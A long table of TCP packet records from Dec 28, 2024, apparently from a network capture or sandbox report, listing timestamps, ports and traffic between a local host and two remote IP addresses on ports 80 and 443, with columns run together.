                                                                                                                                                                        Dec 28, 2024 09:56:55.139873028 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.139875889 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.139880896 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.140110016 CET4971480192.168.2.12194.87.58.92
                                                                                                                                                                        Dec 28, 2024 09:56:55.140185118 CET4971480192.168.2.12194.87.58.92
                                                                                                                                                                        Dec 28, 2024 09:56:55.252978086 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.253042936 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.253096104 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.253138065 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.253252029 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.253344059 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.253391027 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.253443003 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.253583908 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.253679037 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.253838062 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.253918886 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.253987074 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.254070997 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.254148960 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.254162073 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.254323006 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.254379034 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.254478931 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.254547119 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.254600048 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.254650116 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.254736900 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.254784107 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.254867077 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.254921913 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.254991055 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.255043030 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.255184889 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.255188942 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.255289078 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.255342960 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.255449057 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.255453110 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.255578995 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.255583048 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.255683899 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.255688906 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.255781889 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.255785942 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.255882025 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.255887032 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.255934954 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.255939007 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.256026030 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.256031990 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.256158113 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.256161928 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.256198883 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.256242990 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.256315947 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.256320000 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.256401062 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.256405115 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.256630898 CET4971480192.168.2.12194.87.58.92
                                                                                                                                                                        Dec 28, 2024 09:56:55.259704113 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.259707928 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.259802103 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.259857893 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.259957075 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.259960890 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.260004997 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.260009050 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.260166883 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.260171890 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.260220051 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.260266066 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.260355949 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.260360003 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.260457993 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.260545969 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.260550022 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.260555029 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.260710001 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.260714054 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.260828018 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.260844946 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.260982990 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.260996103 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.261065006 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.261070013 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.261162996 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.261167049 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.261272907 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.261404991 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.261409998 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.261441946 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.261512041 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.261518002 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.261641026 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.261645079 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.261718035 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.261722088 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.261794090 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.261816025 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.261872053 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.261904001 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.261981964 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.261996031 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.262105942 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.262110949 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.262147903 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.262151957 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.262234926 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.262240887 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.262346983 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.262351036 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.262392998 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.262455940 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.376352072 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.376389980 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.376503944 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.376543045 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.376667023 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.376718044 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.376838923 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.376863956 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.376955032 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.376981020 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.377110958 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.377135992 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.377242088 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.377250910 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.377347946 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.377374887 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.377458096 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.377468109 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.377552986 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.377566099 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.377661943 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.377692938 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.378026962 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.378036976 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.378041029 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.378045082 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.378062010 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.378066063 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.378145933 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.378150940 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.378226042 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.378231049 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.378323078 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.378329039 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.378415108 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:55.378421068 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:57.466742992 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:57.466759920 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:57.466866016 CET4971480192.168.2.12194.87.58.92
                                                                                                                                                                        Dec 28, 2024 09:56:57.467062950 CET4971480192.168.2.12194.87.58.92
                                                                                                                                                                        Dec 28, 2024 09:56:57.586581945 CET8049714194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:57.665193081 CET4971780192.168.2.12194.87.58.92
                                                                                                                                                                        Dec 28, 2024 09:56:57.784656048 CET8049717194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:57.784744024 CET4971780192.168.2.12194.87.58.92
                                                                                                                                                                        Dec 28, 2024 09:56:57.784992933 CET4971780192.168.2.12194.87.58.92
                                                                                                                                                                        Dec 28, 2024 09:56:57.904438972 CET8049717194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:58.260549068 CET49718443192.168.2.12104.21.2.51
                                                                                                                                                                        Dec 28, 2024 09:56:58.260601044 CET44349718104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:58.260677099 CET49718443192.168.2.12104.21.2.51
                                                                                                                                                                        Dec 28, 2024 09:56:58.263556004 CET49718443192.168.2.12104.21.2.51
                                                                                                                                                                        Dec 28, 2024 09:56:58.263570070 CET44349718104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:59.185481071 CET8049717194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:59.185681105 CET8049717194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:59.185734987 CET4971780192.168.2.12194.87.58.92
                                                                                                                                                                        Dec 28, 2024 09:56:59.185811043 CET4971780192.168.2.12194.87.58.92
                                                                                                                                                                        Dec 28, 2024 09:56:59.486824036 CET4971780192.168.2.12194.87.58.92
                                                                                                                                                                        Dec 28, 2024 09:56:59.493927002 CET8049717194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:59.517399073 CET4972080192.168.2.12194.87.58.92
                                                                                                                                                                        Dec 28, 2024 09:56:59.566418886 CET44349718104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:59.566498995 CET49718443192.168.2.12104.21.2.51
                                                                                                                                                                        Dec 28, 2024 09:56:59.600400925 CET49718443192.168.2.12104.21.2.51
                                                                                                                                                                        Dec 28, 2024 09:56:59.600430965 CET44349718104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:59.600780010 CET44349718104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:59.606494904 CET8049717194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:59.606563091 CET4971780192.168.2.12194.87.58.92
                                                                                                                                                                        Dec 28, 2024 09:56:59.636854887 CET8049720194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:59.636950970 CET4972080192.168.2.12194.87.58.92
                                                                                                                                                                        Dec 28, 2024 09:56:59.643152952 CET49718443192.168.2.12104.21.2.51
                                                                                                                                                                        Dec 28, 2024 09:56:59.649631977 CET4972080192.168.2.12194.87.58.92
                                                                                                                                                                        Dec 28, 2024 09:56:59.679261923 CET49718443192.168.2.12104.21.2.51
                                                                                                                                                                        Dec 28, 2024 09:56:59.679337025 CET49718443192.168.2.12104.21.2.51
                                                                                                                                                                        Dec 28, 2024 09:56:59.679441929 CET44349718104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:56:59.769206047 CET8049720194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:00.389451981 CET44349718104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:00.389560938 CET44349718104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:00.389770031 CET49718443192.168.2.12104.21.2.51
                                                                                                                                                                        Dec 28, 2024 09:57:00.392019033 CET49718443192.168.2.12104.21.2.51
                                                                                                                                                                        Dec 28, 2024 09:57:00.392047882 CET44349718104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:00.397578955 CET49721443192.168.2.12104.21.2.51
                                                                                                                                                                        Dec 28, 2024 09:57:00.397615910 CET44349721104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:00.397696018 CET49721443192.168.2.12104.21.2.51
                                                                                                                                                                        Dec 28, 2024 09:57:00.398022890 CET49721443192.168.2.12104.21.2.51
                                                                                                                                                                        Dec 28, 2024 09:57:00.398036003 CET44349721104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:01.076814890 CET8049720194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:01.076922894 CET8049720194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:01.077094078 CET4972080192.168.2.12194.87.58.92
                                                                                                                                                                        Dec 28, 2024 09:57:01.077253103 CET4972080192.168.2.12194.87.58.92
                                                                                                                                                                        Dec 28, 2024 09:57:01.196640968 CET8049720194.87.58.92192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:01.657397985 CET44349721104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:01.657556057 CET49721443192.168.2.12104.21.2.51
                                                                                                                                                                        Dec 28, 2024 09:57:01.659282923 CET49721443192.168.2.12104.21.2.51
                                                                                                                                                                        Dec 28, 2024 09:57:01.659302950 CET44349721104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:01.659617901 CET44349721104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:01.667992115 CET49721443192.168.2.12104.21.2.51
                                                                                                                                                                        Dec 28, 2024 09:57:01.667992115 CET49721443192.168.2.12104.21.2.51
                                                                                                                                                                        Dec 28, 2024 09:57:01.668117046 CET44349721104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:02.458755970 CET44349721104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:02.458826065 CET44349721104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:02.458858013 CET44349721104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:02.458878040 CET49721443192.168.2.12104.21.2.51
                                                                                                                                                                        Dec 28, 2024 09:57:02.458889008 CET44349721104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:02.458925009 CET49721443192.168.2.12104.21.2.51
                                                                                                                                                                        Dec 28, 2024 09:57:02.458930016 CET44349721104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:02.458940029 CET44349721104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:02.458981991 CET49721443192.168.2.12104.21.2.51
                                                                                                                                                                        Dec 28, 2024 09:57:02.458987951 CET44349721104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:02.466979027 CET44349721104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:02.467046976 CET49721443192.168.2.12104.21.2.51
                                                                                                                                                                        Dec 28, 2024 09:57:02.467056036 CET44349721104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:02.475367069 CET44349721104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:02.475430965 CET49721443192.168.2.12104.21.2.51
                                                                                                                                                                        Dec 28, 2024 09:57:02.475439072 CET44349721104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:02.518040895 CET49721443192.168.2.12104.21.2.51
                                                                                                                                                                        Dec 28, 2024 09:57:02.578367949 CET44349721104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:02.627418041 CET49721443192.168.2.12104.21.2.51
                                                                                                                                                                        Dec 28, 2024 09:57:02.627433062 CET44349721104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:02.663809061 CET44349721104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:02.663867950 CET44349721104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:02.663878918 CET49721443192.168.2.12104.21.2.51
                                                                                                                                                                        Dec 28, 2024 09:57:02.663892031 CET44349721104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:02.663938999 CET49721443192.168.2.12104.21.2.51
                                                                                                                                                                        Dec 28, 2024 09:57:02.663947105 CET44349721104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:02.663979053 CET44349721104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:02.664025068 CET49721443192.168.2.12104.21.2.51
                                                                                                                                                                        Dec 28, 2024 09:57:02.670835972 CET49721443192.168.2.12104.21.2.51
                                                                                                                                                                        Dec 28, 2024 09:57:02.670862913 CET44349721104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:02.670875072 CET49721443192.168.2.12104.21.2.51
                                                                                                                                                                        Dec 28, 2024 09:57:02.670881987 CET44349721104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:02.833770990 CET49722443192.168.2.12104.21.2.51
                                                                                                                                                                        Dec 28, 2024 09:57:02.833811045 CET44349722104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:02.833908081 CET49722443192.168.2.12104.21.2.51
                                                                                                                                                                        Dec 28, 2024 09:57:02.834204912 CET49722443192.168.2.12104.21.2.51
                                                                                                                                                                        Dec 28, 2024 09:57:02.834218979 CET44349722104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:04.092569113 CET44349722104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:04.092642069 CET49722443192.168.2.12104.21.2.51
                                                                                                                                                                        Dec 28, 2024 09:57:04.094290972 CET49722443192.168.2.12104.21.2.51
                                                                                                                                                                        Dec 28, 2024 09:57:04.094300032 CET44349722104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:04.094538927 CET44349722104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:04.095963955 CET49722443192.168.2.12104.21.2.51
                                                                                                                                                                        Dec 28, 2024 09:57:04.096039057 CET49722443192.168.2.12104.21.2.51
                                                                                                                                                                        Dec 28, 2024 09:57:04.096070051 CET44349722104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:04.988487005 CET44349722104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:04.988589048 CET44349722104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:04.988650084 CET49722443192.168.2.12104.21.2.51
                                                                                                                                                                        Dec 28, 2024 09:57:04.988862991 CET49722443192.168.2.12104.21.2.51
                                                                                                                                                                        Dec 28, 2024 09:57:04.988882065 CET44349722104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:05.039135933 CET49723443192.168.2.12104.21.2.51
                                                                                                                                                                        Dec 28, 2024 09:57:05.039176941 CET44349723104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:05.039355040 CET49723443192.168.2.12104.21.2.51
                                                                                                                                                                        Dec 28, 2024 09:57:05.040602922 CET49723443192.168.2.12104.21.2.51
                                                                                                                                                                        Dec 28, 2024 09:57:05.040615082 CET44349723104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:06.345082045 CET44349723104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:06.345220089 CET49723443192.168.2.12104.21.2.51
                                                                                                                                                                        Dec 28, 2024 09:57:06.346668959 CET49723443192.168.2.12104.21.2.51
                                                                                                                                                                        Dec 28, 2024 09:57:06.346677065 CET44349723104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:06.346910000 CET44349723104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:06.348320961 CET49723443192.168.2.12104.21.2.51
                                                                                                                                                                        Dec 28, 2024 09:57:06.348491907 CET49723443192.168.2.12104.21.2.51
                                                                                                                                                                        Dec 28, 2024 09:57:06.348515987 CET44349723104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:06.348583937 CET49723443192.168.2.12104.21.2.51
                                                                                                                                                                        Dec 28, 2024 09:57:06.395323992 CET44349723104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:07.225054026 CET44349723104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:07.225147009 CET44349723104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:07.225263119 CET49723443192.168.2.12104.21.2.51
                                                                                                                                                                        Dec 28, 2024 09:57:07.225394011 CET49723443192.168.2.12104.21.2.51
                                                                                                                                                                        Dec 28, 2024 09:57:07.225419044 CET44349723104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:07.425185919 CET49724443192.168.2.12104.21.2.51
                                                                                                                                                                        Dec 28, 2024 09:57:07.425235987 CET44349724104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:07.425354958 CET49724443192.168.2.12104.21.2.51
                                                                                                                                                                        Dec 28, 2024 09:57:07.425707102 CET49724443192.168.2.12104.21.2.51
                                                                                                                                                                        Dec 28, 2024 09:57:07.425724983 CET44349724104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:08.729378939 CET44349724104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:08.729693890 CET49724443192.168.2.12104.21.2.51
                                                                                                                                                                        Dec 28, 2024 09:57:08.730804920 CET49724443192.168.2.12104.21.2.51
                                                                                                                                                                        Dec 28, 2024 09:57:08.730813980 CET44349724104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:08.731067896 CET44349724104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:08.732405901 CET49724443192.168.2.12104.21.2.51
                                                                                                                                                                        Dec 28, 2024 09:57:08.732517004 CET49724443192.168.2.12104.21.2.51
                                                                                                                                                                        Dec 28, 2024 09:57:08.732543945 CET44349724104.21.2.51192.168.2.12
                                                                                                                                                                        Dec 28, 2024 09:57:08.732595921 CET49724443192.168.2.12104.21.2.51
